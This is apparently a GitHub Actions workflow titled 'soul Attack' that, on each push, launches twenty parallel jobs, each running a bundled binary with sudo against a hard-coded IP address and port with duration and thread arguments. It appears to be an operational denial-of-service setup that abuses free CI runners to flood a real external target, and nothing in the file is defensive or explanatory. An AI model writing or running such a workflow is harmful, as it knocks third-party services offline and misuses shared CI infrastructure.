name: soul Attack
on: [push]

jobs:
  soul:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
    steps:
    - uses: actions/checkout@v3
    - run: chmod +x *
    - run: sudo ./soul 4.213.64.181 29774 120 999
